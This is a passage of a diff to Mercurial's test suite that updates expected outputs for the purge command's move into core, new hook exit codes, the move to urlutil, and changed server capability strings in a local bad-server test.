abort: malformed --config option: '' (use --config section.name=value)
[10]
@@ -230,6 +235,7 @@
$ hg --cwd c --config .b= tip -q
abort: malformed --config option: '.b=' (use --config section.name=value)
[10]
+#endif
Testing --debug:
@@ -264,7 +270,7 @@
Testing --traceback:
-#if no-chg
+#if no-chg no-rhg
$ hg --cwd c --config x --traceback id 2>&1 | grep -i 'traceback'
Traceback (most recent call last):
Traceback (most recent call last): (py3 !)
@@ -351,6 +357,7 @@
addremove add all new files, delete all missing files
files list tracked files
forget forget the specified files on the next commit
+ purge removes files not tracked by Mercurial
remove remove the specified files on the next commit
rename rename files; equivalent of copy + remove
resolve redo merges or set/view the merge status of files
@@ -483,6 +490,7 @@
addremove add all new files, delete all missing files
files list tracked files
forget forget the specified files on the next commit
+ purge removes files not tracked by Mercurial
remove remove the specified files on the next commit
rename rename files; equivalent of copy + remove
resolve redo merges or set/view the merge status of files
--- a/tests/test-graft.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-graft.t Tue Apr 20 11:01:06 2021 -0400
@@ -223,10 +223,6 @@
committing changelog
updating the branch cache
grafting 5:97f8bfe72746 "5"
- all copies found (* = to merge, ! = divergent, % = renamed and deleted):
- on local side:
- src: 'c' -> dst: 'b'
- checking for directory renames
resolving manifests
branchmerge: True, force: True, partial: False
ancestor: 4c60f11aa304, local: 6b9e5368ca4e+, remote: 97f8bfe72746
@@ -240,10 +236,6 @@
$ HGEDITOR=cat hg graft 4 3 --log --debug
scanning for duplicate grafts
grafting 4:9c233e8e184d "4"
- all copies found (* = to merge, ! = divergent, % = renamed and deleted):
- on local side:
- src: 'c' -> dst: 'b'
- checking for directory renames
resolving manifests
branchmerge: True, force: True, partial: False
ancestor: 4c60f11aa304, local: 1905859650ec+, remote: 9c233e8e184d
--- a/tests/test-help-hide.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-help-hide.t Tue Apr 20 11:01:06 2021 -0400
@@ -55,6 +55,7 @@
addremove add all new files, delete all missing files
files list tracked files
forget forget the specified files on the next commit
+ purge removes files not tracked by Mercurial
remove remove the specified files on the next commit
rename rename files; equivalent of copy + remove
resolve redo merges or set/view the merge status of files
@@ -191,6 +192,7 @@
addremove add all new files, delete all missing files
files list tracked files
forget forget the specified files on the next commit
+ purge removes files not tracked by Mercurial
remove remove the specified files on the next commit
rename rename files; equivalent of copy + remove
resolve redo merges or set/view the merge status of files
--- a/tests/test-help.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-help.t Tue Apr 20 11:01:06 2021 -0400
@@ -107,6 +107,7 @@
addremove add all new files, delete all missing files
files list tracked files
forget forget the specified files on the next commit
+ purge removes files not tracked by Mercurial
remove remove the specified files on the next commit
rename rename files; equivalent of copy + remove
resolve redo merges or set/view the merge status of files
@@ -235,6 +236,7 @@
addremove add all new files, delete all missing files
files list tracked files
forget forget the specified files on the next commit
+ purge removes files not tracked by Mercurial
remove remove the specified files on the next commit
rename rename files; equivalent of copy + remove
resolve redo merges or set/view the merge status of files
@@ -375,8 +377,6 @@
mq manage a stack of patches
notify hooks for sending email push notifications
patchbomb command to send changesets as (a series of) patch emails
- purge command to delete untracked files from the working
- directory
relink recreates hardlinks between repository clones
schemes extend schemes with shortcuts to repository swarms
share share a common history between several working directories
@@ -575,7 +575,7 @@
Mercurial Distributed SCM (version *) (glob)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-* Matt Mackall and others (glob)
+ Copyright (C) 2005-* Olivia Mackall and others (glob)
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
@@ -1069,6 +1069,7 @@
debugsetparents
manually set the parents of the current working directory
(DANGEROUS)
+ debugshell run an interactive Python interpreter
debugsidedata
dump the side data for a cl/manifest/file revision
debugssl test a secure connection to a server
@@ -1832,7 +1833,7 @@
These symbolic names can be used from the command line. To pull from
"my_server": 'hg pull my_server'. To push to "local_path": 'hg push
- local_path'.
+ local_path'. You can check 'hg help urls' for details about valid URLs.
Options containing colons (":") denote sub-options that can influence
behavior for that specific path. Example:
@@ -1841,6 +1842,9 @@
my_server = https://example.com/my_path
my_server:pushurl = ssh://example.com/my_path
+ Paths using the 'path://otherpath' scheme will inherit the sub-options
+ value from the path they point to.
+
The following sub-options can be defined:
"pushurl"
@@ -2720,6 +2724,13 @@
set or show the current phase name
</td></tr>
<tr><td>
+ <a href="/help/purge">
+ purge
+ </a>
+ </td><td>
+ removes files not tracked by Mercurial
+ </td></tr>
+ <tr><td>
<a href="/help/recover">
recover
</a>
--- a/tests/test-hg-parseurl.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hg-parseurl.py Tue Apr 20 11:01:06 2021 -0400
@@ -2,44 +2,48 @@
import unittest
-from mercurial import hg
+from mercurial.utils import urlutil
class ParseRequestTests(unittest.TestCase):
def testparse(self):
self.assertEqual(
- hg.parseurl(b'http://example.com/no/anchor'),
+ urlutil.parseurl(b'http://example.com/no/anchor'),
(b'http://example.com/no/anchor', (None, [])),
)
self.assertEqual(
- hg.parseurl(b'http://example.com/an/anchor#foo'),
+ urlutil.parseurl(b'http://example.com/an/anchor#foo'),
(b'http://example.com/an/anchor', (b'foo', [])),
)
self.assertEqual(
- hg.parseurl(b'http://example.com/no/anchor/branches', [b'foo']),
+ urlutil.parseurl(
+ b'http://example.com/no/anchor/branches', [b'foo']
+ ),
(b'http://example.com/no/anchor/branches', (None, [b'foo'])),
)
self.assertEqual(
- hg.parseurl(b'http://example.com/an/anchor/branches#bar', [b'foo']),
+ urlutil.parseurl(
+ b'http://example.com/an/anchor/branches#bar', [b'foo']
+ ),
(b'http://example.com/an/anchor/branches', (b'bar', [b'foo'])),
)
self.assertEqual(
- hg.parseurl(
+ urlutil.parseurl(
b'http://example.com/an/anchor/branches-None#foo', None
),
(b'http://example.com/an/anchor/branches-None', (b'foo', [])),
)
self.assertEqual(
- hg.parseurl(b'http://example.com/'),
+ urlutil.parseurl(b'http://example.com/'),
(b'http://example.com/', (None, [])),
)
self.assertEqual(
- hg.parseurl(b'http://example.com'),
+ urlutil.parseurl(b'http://example.com'),
(b'http://example.com/', (None, [])),
)
self.assertEqual(
- hg.parseurl(b'http://example.com#foo'),
+ urlutil.parseurl(b'http://example.com#foo'),
(b'http://example.com/', (b'foo', [])),
)
--- a/tests/test-hgrc.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgrc.t Tue Apr 20 11:01:06 2021 -0400
@@ -59,7 +59,7 @@
#if unix-permissions no-root
$ chmod u-r $TESTTMP/included
$ hg showconfig section
- config error at $TESTTMP/hgrc:2: cannot include $TESTTMP/included (Permission denied)
+ config error at $TESTTMP/hgrc:2: cannot include $TESTTMP/included (Permission denied*) (glob)
[255]
#endif
@@ -84,7 +84,7 @@
Mercurial Distributed SCM (version *) (glob)
(see https://mercurial-scm.org for more information)
- Copyright (C) 2005-* Matt Mackall and others (glob)
+ Copyright (C) 2005-* Olivia Mackall and others (glob)
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ unset FAKEPATH
--- a/tests/test-hgweb-auth.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgweb-auth.py Tue Apr 20 11:01:06 2021 -0400
@@ -10,7 +10,10 @@
url,
util,
)
-from mercurial.utils import stringutil
+from mercurial.utils import (
+ stringutil,
+ urlutil,
+)
urlerr = util.urlerr
urlreq = util.urlreq
@@ -60,7 +63,7 @@
print('URI:', pycompat.strurl(uri))
try:
pm = url.passwordmgr(ui, urlreq.httppasswordmgrwithdefaultrealm())
- u, authinfo = util.url(uri).authinfo()
+ u, authinfo = urlutil.url(uri).authinfo()
if authinfo is not None:
pm.add_password(*_stringifyauthinfo(authinfo))
print(
@@ -198,10 +201,12 @@
def testauthinfo(fullurl, authurl):
print('URIs:', fullurl, authurl)
pm = urlreq.httppasswordmgrwithdefaultrealm()
- ai = _stringifyauthinfo(util.url(pycompat.bytesurl(fullurl)).authinfo()[1])
+ ai = _stringifyauthinfo(
+ urlutil.url(pycompat.bytesurl(fullurl)).authinfo()[1]
+ )
pm.add_password(*ai)
print(pm.find_user_password('test', authurl))
-print('\n*** Test urllib2 and util.url\n')
+print('\n*** Test urllib2 and urlutil.url\n')
testauthinfo('http://user@example.com:8080/foo', 'http://example.com:8080/foo')
--- a/tests/test-hgweb-auth.py.out Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgweb-auth.py.out Tue Apr 20 11:01:06 2021 -0400
@@ -211,7 +211,7 @@
URI: http://example.org/foo
abort
-*** Test urllib2 and util.url
+*** Test urllib2 and urlutil.url
URIs: http://user@example.com:8080/foo http://example.com:8080/foo
('user', '')
--- a/tests/test-hgweb-commands.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgweb-commands.t Tue Apr 20 11:01:06 2021 -0400
@@ -2193,7 +2193,8 @@
lookup
pushkey
stream-preferred
- streamreqs=generaldelta,revlogv1,sparserevlog
+ streamreqs=generaldelta,revlogv1,sparserevlog (no-rust !)
+ streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog (rust !)
unbundle=HG10GZ,HG10BZ,HG10UN
unbundlehash
--- a/tests/test-hgweb-filelog.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgweb-filelog.t Tue Apr 20 11:01:06 2021 -0400
@@ -656,7 +656,7 @@
An error occurred while processing your request:
</p>
<p>
- a@6563da9dcf87: not found in manifest
+ a@6563da9dcf87b1949716e38ff3e3dfaa3198eb06: not found in manifest
</p>
</div>
</div>
--- a/tests/test-hgweb-json.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgweb-json.t Tue Apr 20 11:01:06 2021 -0400
@@ -2190,6 +2190,10 @@
"topic": "phase"
},
{
+ "summary": "removes files not tracked by Mercurial",
+ "topic": "purge"
+ },
+ {
"summary": "roll back an interrupted transaction",
"topic": "recover"
},
--- a/tests/test-hgweb.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgweb.t Tue Apr 20 11:01:06 2021 -0400
@@ -149,7 +149,7 @@
404 Not Found
- error: bork@2ef0ac749a14: not found in manifest
+ error: bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest
[1]
$ get-with-headers.py localhost:$HGPORT 'file/tip/bork'
404 Not Found
@@ -202,7 +202,7 @@
An error occurred while processing your request:
</p>
<p>
- bork@2ef0ac749a14: not found in manifest
+ bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest
</p>
</div>
</div>
@@ -218,7 +218,7 @@
404 Not Found
- error: bork@2ef0ac749a14: not found in manifest
+ error: bork@2ef0ac749a14e4f57a5a822464a0902c6f7f448f: not found in manifest
[1]
try bad style
--- a/tests/test-hgwebdir.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hgwebdir.t Tue Apr 20 11:01:06 2021 -0400
@@ -103,7 +103,7 @@
404 Not Found
- error: bork@8580ff50825a: not found in manifest
+ error: bork@8580ff50825a50c8f716709acdf8de0deddcd6ab: not found in manifest
[1]
should succeed
--- a/tests/test-histedit-edit.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-histedit-edit.t Tue Apr 20 11:01:06 2021 -0400
@@ -375,7 +375,7 @@
note: commit message saved in .hg/last-message.txt
note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ cat .hg/last-message.txt
f
@@ -400,7 +400,7 @@
note: commit message saved in .hg/last-message.txt
note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it
abort: pretxncommit.unexpectedabort hook exited with status 1
- [255]
+ [40]
$ cat >> .hg/hgrc <<EOF
> [hooks]
--- a/tests/test-histedit-fold.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-histedit-fold.t Tue Apr 20 11:01:06 2021 -0400
@@ -202,7 +202,7 @@
transaction abort!
rollback completed
abort: pretxncommit.abortfolding hook failed
- [255]
+ [40]
$ cat .hg/last-message.txt
f
--- a/tests/test-histedit-non-commute-abort.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-histedit-non-commute-abort.t Tue Apr 20 11:01:06 2021 -0400
@@ -84,6 +84,7 @@
ancestor path: e (node 0000000000000000000000000000000000000000)
other path: e (node 6b67ccefd5ce6de77e7ead4f5292843a0255329f)
extra: ancestorlinknode = 0000000000000000000000000000000000000000
+ extra: merged = yes
$ hg resolve -l
U e
--- a/tests/test-hook.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-hook.t Tue Apr 20 11:01:06 2021 -0400
@@ -227,7 +227,7 @@
HG_PATS=[]
abort: pre-identify hook exited with status 1
- [255]
+ [40]
$ hg cat b
pre-cat hook: HG_ARGS=cat b
HG_HOOKNAME=pre-cat
@@ -390,7 +390,7 @@
HG_TAG=fa
abort: pretag.forbid hook exited with status 1
- [255]
+ [40]
$ hg tag -l fla
pretag hook: HG_HOOKNAME=pretag
HG_HOOKTYPE=pretag
@@ -405,7 +405,7 @@
HG_TAG=fla
abort: pretag.forbid hook exited with status 1
- [255]
+ [40]
pretxncommit hook can see changeset, can roll back txn, changeset no
more there after
@@ -451,7 +451,7 @@
rollback completed
abort: pretxncommit.forbid1 hook exited with status 1
- [255]
+ [40]
$ hg -q tip
4:539e4b31b6dc
@@ -485,7 +485,7 @@
HG_PARENT1=539e4b31b6dc99b3cfbaa6b53cbc1c1f9a1e3a10
abort: precommit.forbid hook exited with status 1
- [255]
+ [40]
$ hg -q tip
4:539e4b31b6dc
@@ -644,7 +644,7 @@
HG_URL=file:$TESTTMP/a
abort: prepushkey hook exited with status 1
- [255]
+ [40]
$ cd ../a
test that prelistkeys can prevent listing keys
@@ -679,7 +679,7 @@
HG_NAMESPACE=bookmarks
abort: prelistkeys hook exited with status 1
- [255]
+ [40]
$ cd ../a
$ rm .hg/hgrc
@@ -704,7 +704,7 @@
HG_URL=file:$TESTTMP/a
abort: prechangegroup.forbid hook exited with status 1
- [255]
+ [40]
pretxnchangegroup hook can see incoming changes, can roll back txn,
incoming changes no longer there after
@@ -735,7 +735,7 @@
transaction abort!
rollback completed
abort: pretxnchangegroup.forbid1 hook exited with status 1
- [255]
+ [40]
$ hg -q tip
3:07f3376c1e65
@@ -786,7 +786,7 @@
HG_SOURCE=pull
abort: preoutgoing.forbid hook exited with status 1
- [255]
+ [40]
outgoing hooks work for local clones
@@ -825,7 +825,7 @@
HG_SOURCE=clone
abort: preoutgoing.forbid hook exited with status 1
- [255]
+ [40]
$ cd "$TESTTMP/b"
@@ -915,7 +915,7 @@
hooktype preoutgoing
source pull
abort: preoutgoing.fail hook failed
- [255]
+ [40]
$ echo '[hooks]' > ../a/.hg/hgrc
$ echo 'preoutgoing.uncallable = python:hooktests.uncallable' >> ../a/.hg/hgrc
@@ -1283,7 +1283,7 @@
rollback completed
strip failed, backup bundle stored in * (glob)
abort: pretxnclose.error hook exited with status 1
- [255]
+ [40]
$ hg recover
no interrupted transaction available
[1]
@@ -1306,7 +1306,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
$ cp .hg/store/00changelog.i.a.saved .hg/store/00changelog.i.a
(check (in)visibility of new changeset while transaction running in
@@ -1331,7 +1331,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
Hook from untrusted hgrc are reported as failure
================================================
@@ -1382,7 +1382,7 @@
rollback completed
abort: untrusted hook pretxnclose.testing not executed
(see 'hg help config.trusted')
- [255]
+ [40]
$ hg log
changeset: 0:3903775176ed
tag: tip
@@ -1407,12 +1407,12 @@
$ cat << EOF >> .hg/hgrc
> [hooks]
- > pre-version.testing-default=echo '### default ###' plain: \${HGPLAIN:-'<unset>'}
- > pre-version.testing-yes=echo '### yes #######' plain: \${HGPLAIN:-'<unset>'}
+ > pre-version.testing-default=sh -c "echo '### default ###' plain: \${HGPLAIN:-'<unset>'}"
+ > pre-version.testing-yes=sh -c "echo '### yes #######' plain: \${HGPLAIN:-'<unset>'}"
> pre-version.testing-yes:run-with-plain=yes
- > pre-version.testing-no=echo '### no ########' plain: \${HGPLAIN:-'<unset>'}
+ > pre-version.testing-no=sh -c "echo '### no ########' plain: \${HGPLAIN:-'<unset>'}"
> pre-version.testing-no:run-with-plain=no
- > pre-version.testing-auto=echo '### auto ######' plain: \${HGPLAIN:-'<unset>'}
+ > pre-version.testing-auto=sh -c "echo '### auto ######' plain: \${HGPLAIN:-'<unset>'}"
> pre-version.testing-auto:run-with-plain=auto
> EOF
--- a/tests/test-http-bad-server.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-http-bad-server.t Tue Apr 20 11:01:06 2021 -0400
@@ -13,6 +13,7 @@
> fakeversion = `pwd`/fakeversion.py
> [format]
> sparse-revlog = no
+ > use-persistent-nodemap = no
> [devel]
> legacy.exchange = phases
> [server]
@@ -118,17 +119,17 @@
readline(115 from *) -> (*) host: localhost:$HGPORT\r\n (glob)
readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(* from *) -> (2) \r\n (glob)
- sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
+ write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !)
write(23) -> Server: badhttpserver\r\n (no-py3 !)
write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !)
write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21) -> Content-Length: 450\r\n (no-py3 !)
+ write(21) -> Content-Length: 431\r\n (no-py3 !)
write(2) -> \r\n (no-py3 !)
- write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(4? from 65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n (glob)
readline(1? from *) -> (1?) Accept-Encoding* (glob)
read limit reached; closing socket
@@ -163,17 +164,17 @@
readline(213 from *) -> (*) host: localhost:$HGPORT\r\n (glob)
readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(* from *) -> (2) \r\n (glob)
- sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py36 !)
+ sendall(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
+ write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\n (py3 no-py36 !)
+ write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !)
write(23) -> Server: badhttpserver\r\n (no-py3 !)
write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !)
write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21) -> Content-Length: 450\r\n (no-py3 !)
+ write(21) -> Content-Length: 431\r\n (no-py3 !)
write(2) -> \r\n (no-py3 !)
- write(450) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ write(431) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(13? from 65537) -> (26) GET /?cmd=batch HTTP/1.1\r\n (glob)
readline(1?? from *) -> (27) Accept-Encoding: identity\r\n (glob)
readline(8? from *) -> (29) vary: X-HgArg-1,X-HgProto-1\r\n (glob)
@@ -228,17 +229,17 @@
readline(234 from *) -> (2?) host: localhost:$HGPORT\r\n (glob)
readline(* from *) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(* from *) -> (2) \r\n (glob)
- sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 463\r\n\r\n (py36 !)
- sendall(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
- write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 463\r\n\r\n (py3 no-py36 !)
- write(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
+ sendall(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 444\r\n\r\n (py36 !)
+ sendall(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py36 !)
+ write(160) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 444\r\n\r\n (py3 no-py36 !)
+ write(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (py3 no-py36 !)
write(36) -> HTTP/1.1 200 Script output follows\r\n (no-py3 !)
write(23) -> Server: badhttpserver\r\n (no-py3 !)
write(37) -> Date: $HTTP_DATE$\r\n (no-py3 !)
write(41) -> Content-Type: application/mercurial-0.1\r\n (no-py3 !)
- write(21) -> Content-Length: 463\r\n (no-py3 !)
+ write(21) -> Content-Length: 444\r\n (no-py3 !)
write(2) -> \r\n (no-py3 !)
- write(463) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
+ write(444) -> batch branchmap $USUAL_BUNDLE2_CAPS_NO_PHASES$ changegroupsubset compression=none getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx httppostargs known lookup pushkey streamreqs=generaldelta,revlogv1 unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-py3 !)
readline(1?? from 65537) -> (27) POST /?cmd=batch HTTP/1.1\r\n (glob)
readline(1?? from *) -> (27) Accept-Encoding: identity\r\n (glob)
readline(1?? from *) -> (41) content-type: application/mercurial-0.1\r\n (glob)
@@ -296,7 +297,7 @@
Traceback (most recent call last):
Exception: connection closed after sending N bytes
- write(286) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\nHTTP/1.1 500 Internal Server Error\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nTransfer-Encoding: chunked\r\n\r\n (py3 no-py36 !)
+ write(286) -> HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 431\r\n\r\nHTTP/1.1 500 Internal Server Error\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nTransfer-Encoding: chunked\r\n\r\n (py3 no-py36 !)
write(36) -> HTTP/1.1 500 Internal Server Error\r\n (no-py3 !)
$ rm -f error.log
@@ -307,7 +308,7 @@
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
- abort: HTTP request error (incomplete response; expected 450 bytes got 20)
+ abort: HTTP request error (incomplete response; expected 431 bytes got 20)
(this may be an intermittent network failure; if the error persists, consider contacting the network or server operator)
[255]
@@ -320,17 +321,17 @@
readline(*) -> (2?) host: localhost:$HGPORT\r\n (glob)
readline(*) -> (49) user-agent: mercurial/proto-1.0 (Mercurial 4.2)\r\n (glob)
readline(*) -> (2) \r\n (glob)
- sendall(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py36 !)
- sendall(20 from 450) -> (0) batch branchmap bund (py36 !)
- write(160 from 160) -> (20) HTTP/1.1 200 Script output follows\r\nServer: badhttpserver\r\nDate: $HTTP_DATE$\r\nContent-Type: application/mercurial-0.1\r\nContent-Length: 450\r\n\r\n (py3 no-py36 !)
- write(20 from 450) -> (0) batch branchmap bund (py3 no-py36 !)
